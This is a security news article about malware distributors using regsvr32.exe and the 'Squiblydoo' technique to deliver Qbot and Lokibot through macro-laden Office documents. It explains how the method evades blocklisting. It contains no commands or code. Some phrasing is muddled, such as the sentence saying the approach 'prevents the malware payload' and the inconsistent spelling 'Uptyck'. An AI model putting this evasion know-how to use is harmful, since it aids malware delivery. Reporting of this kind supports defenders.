To transmit Qbot and Lokibot via Microsoft Office document employing regsvr32.exe, malware distributors have reverted to an earlier method known as Squiblydoo. According to a report from the threat research team at security analytics platform Uptycs, the use of regsvr32.exe has increased for the past several months. It occurs via numerous document formats, but mostly Excel files.
The fact that it allows threat actors to escape application blocklisting, which might halt the infection chain, explains the recent interest in this command-line program. According to telemetry data acquired from Uptyck’s clients, most occurrences of Windows resident tool misuse were documented in December 2021, although the high rates remained in 2022.
The regsvr32 command-line program in Windows is used to register and unregister OLEs (DLLs and ActiveX controls) in the registry. Threat actors use the tool to load COM scriptlets from a remote source via DLLs (scrobj.dll) rather than perform registry changes. They do this by registering OCX files, which are special-purpose software modules that may call ready-made components like DLLs, with regsvr32.
This method is known as “Squiblydoo.” It has been used in malware distribution activities since 2017. ESET researchers first detected it in a campaign aimed at Brazilian targets back then. In the current campaign, threat actors exploit malicious macros in Excel, Word, RTF, and composite document files to launch the regsvr32 process as a child process.
Most of these papers are delivered through phishing efforts; however, they can also be dumped through “blind” SEO poisoning attempts. Because regsvr32 is a Windows program employed for various regular processes, the above approach effectively prevents the malware payload. As a result, security solutions are less likely to detect the danger and intervene to break the chain of infection.
Additionally, attackers may load fileless malware via remote COM scriptlets, and because these payloads execute from within the document, detection is less likely. On this GitHub repository, Uptyck has released a collection of signs of compromise that may be employed for focused threat hunting.
